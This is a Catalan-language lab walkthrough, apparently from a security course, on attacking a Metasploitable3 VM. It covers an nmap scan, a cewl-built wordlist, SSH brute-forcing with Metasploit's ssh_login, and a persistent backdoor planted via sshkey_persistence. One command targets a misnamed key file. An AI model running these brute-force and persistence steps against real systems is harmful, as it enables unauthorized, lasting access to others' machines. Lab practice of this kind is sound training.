# Exploit mitjançant SSH

En aquesta pràctica accedirem a la màquina remota de Metasploitable3 mitjançant **ssh** i, un cop fet, hi crearem una **backdoor** per tal de tenir-hi accés persistentment. Comencem!

En primer lloc, accedim a la consola de Metasploit:

![](../imatges/ssh1.png)

Un cop a dins, ens hem d'assegurar que el port de l'SSH estigui obert, pel que utilitzarem *nmap* (la consola permet executar certes comandes externes sense haver de sortir-ne). De totes maneres, Metasploit ens ofereix un mòdul per escanejar els ports però és significativament més lent que *nmap*.

> nmap -p1-30 -sV 10.0.2.4

![](../imatges/ssh2.png)

Ara que sabem que el port 22 està obert amb el servei d'SSH, necessitem crear un fitxer amb les contrasenyes que l'exploit anarà provant per accedir-hi (el nom d'usuari es suposa que ja es coneix).

Aquest fitxer l'he creat mitjançant la comanda *cewl*, la qual, donada una url, agafa paraules d'allà i les emmagatzema en un document de text.

> cewl -m 7 -d 0 -w pass.txt https://github.com/rapid7/metasploitable3/wiki

![](../imatges/ssh3.png)

Així doncs, ja podem configurar l'exploit que utilitzarem: **ssh_login**

> use auxiliary/scanner/ssh/ssh_login
> show options

![](../imatges/ssh4.png)

Definim els paràmetres necessaris: host remot, port que atacarem, nom d'usuari ssh, el fitxer amb les contrasenyes i l'opció de parar-se al primer cas exitós:

> set rhosts 10.0.2.4
> set port 22
> set username vagrant
> set pass_file /home/kali/pass.txt
> set stop_on_success true

![](../imatges/ssh5.png)

Ja podem executar l'exploit:

> exploit

![](../imatges/ssh6.png)

Com es pot veure, aquest ha tingut èxit, pel que si ara executem la comanda *sessions* podem veure que s'ha iniciat una sessió remota a la màquina atacada.

> sessions

![](../imatges/ssh7.png)

Per connectar-nos-hi, cal executem la següent ordre:

> sessions -i 1

Un cop oberta la shell de la víctima, ja podem fer el que volguem: navegar pels directoris, modificar fitxers, etc.

> whoami

> ls

> cd Documents

![](../imatges/ssh8.png)

![](../imatges/ssh9.png)

### Creació de la 'backdoor'

Ara que tenim una sessió oberta a la màquina remota, podem utilitzar el mòdul **sshkey_persistence**, el qual afegirà una clau SSH a un usuari específuc per tal de permetre l’inici de sessió remota a la víctima en qualsevol moment. Així doncs, haurem creat una *backdoor* al sistema.

En primer lloc, especifiquem el mòdul que utilitzarem i, a n'aquest, afegim l'id de la sessió oberta:

> use post/linux/manage/sshkey_persistence

> set session 1

![](../imatges/ssh10.png)

Executem l'exploit:

> exploit

![](../imatges/ssh11.png)

Com podem veure, aquest ha creat una nova clau privada i l'ha afegida tant al sistema remot com al nostre directori local, pel que ja hi tenim accés.

Abans de provar que funciona correctament, li he volgut canviar el nom a la clau i assignar-li permissos 600 (tot fora de la consola de MSF):

> cd .msf4/loot/

> ls

> mv 20200... key-ssh

> chmod 600 ssh-key

![](../imatges/ssh12.png)

Un cop modificat, provem d'accedir al sistema en qüestió:

> ssh -i key-ssh vagrant@10.0.2.4

![](../imatges/ssh13.png)

Èxit! Ara tenim accés al sistema persistentment.